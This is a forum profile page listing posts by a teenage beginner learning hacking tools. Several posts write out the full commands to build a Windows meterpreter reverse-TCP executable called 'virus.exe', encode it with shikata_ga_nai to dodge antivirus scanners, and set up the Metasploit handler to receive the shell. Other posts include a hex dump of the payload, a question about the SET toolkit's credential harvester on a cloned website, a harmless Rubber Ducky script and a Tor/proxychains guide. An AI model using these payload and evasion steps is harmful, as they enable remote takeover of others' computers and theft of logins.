Jump to content

IAMGiGaByTeX86

Active Members
  • Posts

    11
  • Joined

  • Last visited

Posts posted by IAMGiGaByTeX86

  1. You are never to old to learn anything. I first picked up linux when I was about 13 or so back in the day when ubuntu would ship free installation disks if you requested them. I still have 10.04 on an "official" dvd from ubuntu.

    Just a tip though, since you are young and its easy to get mixed up with the wrong things. Don't get mixed up with the wrong things and learn as much as you can about everything that you can

    Yeah i first started to look into aircrack and metasploit but after i know how to create a simple payload i wanted to know what each commands does excactly so i try to learn that and now im learning all the normal linux commands like grep , pipe | and stuff and later i look into the thing like wireshark and how it works and what it does exactly.

  2. Hello guys,

    So my question is how old where u guys when u started learning linux and hacking?

    Because im 16 now and i started 3 weeks ago and i wanted to know if its a good age to learn it or am i too late?

    Seeya!

  3. this maybe dumb question. Did u setup msf multi/handler?

    Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload.

    Also post your multi/handler commands

    try a few payloads.

    I will post my entire proces making the payload and exploiting it :D

    1. Open terminal
    2. msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe
    
    
    3. open 2nd terminal
    4. msfconsole
    5. use exploit/multi/handler
    6. set payload windows/meterpreter/reverse_tcp
    7. set LPORT=MYPORT
    8. set LHOST=MYLOCALIP
    9. exploit
    
    
    

    So yes i use exploit/multi/handler in preparing the exploit in msfconsole.

    Also if i create the payload without encoding it with shikataganai it works, but then its getting picked up by virusscanners, so i use the shikata to prevent that, although mubix said shikata is not for avoiding virusscanner and firewalls i dont know any other way to avoid then other then shikata, if you do i would be so thankfull if you post it here :D

  4. Thanks for your reply, and yeah i started all the hacking stuff like 3 weeks ago, but i think its alot of fun and i really want to get better at it :D

    i runned od -t x1 FILENAME on my virus.exe and this was the outcome,i paste my hex in here.

    0000000 be 88 90 6f 3c da c3 d9 74 24 f4 5a 29 c9 b1 49
    0000020 31 72 14 83 c2 04 03 72 10 6a 65 93 d4 e3 86 6c
    0000040 25 93 0f 89 14 81 74 d9 05 15 fe 8f a5 de 52 24
    0000060 3d 92 7a 4b f6 18 5d 62 07 ad 61 28 cb ac 1d 33
    0000100 18 0e 1f fc 6d 4f 58 e1 9e 1d 31 6d 0c b1 36 33
    0000120 8d b0 98 3f ad ca 9d 80 5a 60 9f d0 f3 ff d7 c8
    0000140 78 a7 c7 e9 ad b4 34 a3 da 0e ce 32 0b 5f 2f 05
    0000160 73 33 0e a9 7e 4a 56 0e 61 39 ac 6c 1c 39 77 0e
    0000200 fa cc 6a a8 89 76 4f 48 5d e0 04 46 2a 67 42 4b
    0000220 ad a4 f8 77 26 4b 2f fe 7c 6f eb 5a 26 0e aa 06
    0000240 89 2f ac ef 76 95 a6 02 62 af e4 4a 47 9d 16 8b
    0000260 cf 96 65 b9 50 0c e2 f1 19 8a f5 f6 33 6a 69 09
    0000300 bc 8a a3 ce e8 da db e7 90 b1 1b 07 45 15 4c a7
    0000320 36 d5 3c 07 e7 bd 56 88 d8 dd 58 42 71 77 a2 05
    0000340 21 e7 d3 2b b5 e5 2b c5 1a 60 cd 8f b2 24 45 38
    0000360 2a 6d 1d d9 b3 b8 5b d9 38 4e 9b 94 c8 3b 8f 41
    0000400 39 76 ed c4 46 ad 98 e8 d2 49 0b be 4a 53 6a 88
    0000420 d4 ac 59 82 dd 38 22 fd 21 ac a2 fd 77 ex,a6 a2 95
    0000440 2f 92 f0 80 2f 0f 65 19 ba af dc cd 6d c7 e2 28
    0000460 59 48 1c 1f 5b b5 cb 66 d9 cf 79 8b 21
    0000475
    
    

    thats my hex , is anything wrong?

  5. Hey guys,

    So i have a little problem which i do not know how to solve.

    The problem is that when i encode my payload with x86/shikata_ga_nai and i try it on my windows pc it says it cannot run on the os

    this is what i typed

    msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe
    

    did i do something wrong , i tested it on win 8 , win 7 and win xp and it says cannot open on every system :(

    Does someone know the solution

    Thank you,

  6. Hello guys,

    So with the latest kali linux/backbox i have one huge problem with the SET toolkit for example

    When i cloned my website and the set toolkit is running it says

    apache is set to - everything will be placed in your web root directory of apache.

    Files wil lbe written out to the root directory of apache

    All files are within your apache directory since you spefied it to on

    Apache maybe not runiing do you want set to start the process [y/n]

    So i strungle with this alot because i dont want to have my harvester logs in the apache web root folder i just want it to be displayed in the terminal like in kali 1.0.6 or something without all this apache crap :(

    I hope some of u know the solution for this problem :)

    Thank you,

  7. Hello guys

    I wrote a very simple script where u cant past your ascii art into a notepad.

    In case u dont know what ascii is its something like :

    _______ _
    |__ __| | |
    | | ___ ___| |_
    | |/ _ \/ __| __|
    | | __/\__ \ |_
    |_|\___||___/\__|

    U can generate your art from :

    http://patorjk.com/software/taag/#p=display&f=Big&t=%0A

    So lets get started

    REM So first we are going to open notepad
    DELAY 1000
    GUI r
    DELAY 300
    STRING notepad
    ENTER
    DELAY 300
    REM now insert the ascii text bij pasting in into your script.txt and add STRING and ENTER to every part of it.
    REM for example
    STRING
    ENTER _______        _   
    STRING |__   __|      | |  
    ENTER    | | ___  ___| |_
    STRING    | |/ _ \/ __| __|
    ENTER    | |  __/\__ \ |_
    STRING    |_|\___||___/\__|
    ENTER   
    
    REM please comment if you like or if i did something wrong it its my first simple script. 
    REM u  can change the DELAY to what you like :)
    

    So thats it, i hope u guys liked it :D

    The only thing u need to do is change it to a injection.bin

    I actually dont own a rubber ducky so im not able to test it but it should work :D

    Seeya,

  8. Hello, firstly I am new so yeah sorry If I post this in the wrong section etc...

    Okay so here is the deal I have an awesome PFSENSE setup, (custom router blah). My question is as when it comes to networking I am a complete NOOB (only reason I have managed to set up pfsense is help of tutorials haha), How could I encrypt all my internet traffic LAN and WAN (like a transparent proxy/vpn) without actually using an external VPN or some other dudes VPN service (dont know if I can trust people providing the VPN).

    So using pfsense I can connect to a VPN easily but can I make the VPN local in the same network but make all traffic go through that first? I dont know if this makes any sense, but I basically wish to find a way to encrypt all my internet traffic without the use of a external VPN

    Thanks :)

    Are you using Linux or something like it,because if you want anonymity for free i suggest download and installing tor vidalia,then go into your proxychains configuration file and add free proxy servers from for example hidemy ass, your internet will bee much slower but it does work.

    Il provide instructions below

    Requirements :

    Any Linux Distribution

    Step 1

    Install tor vidalia using

    Sudo apt-get install tor vidalia

    step 2

    Start tor vidalia using

    sudo service tor start

    step 3

    type

    Locate proxychains

    step 4

    type

    sudo leafpad <file to your proxy conf>

    step 5

    get some free proxyservers from hidemyass.com (google is your friend)

    step 6

    enter them where is

    enter proxxy here

    step 7

    uncomment dynamicc chain and random chain

    step 8

    go to your browser settings and where manual proxy instert where sockshost socks 4 <tor ip> port <tor port>

    step 9

    Check it using whatsmyip.org

    I hope this helps :D

×
×
  • Create New...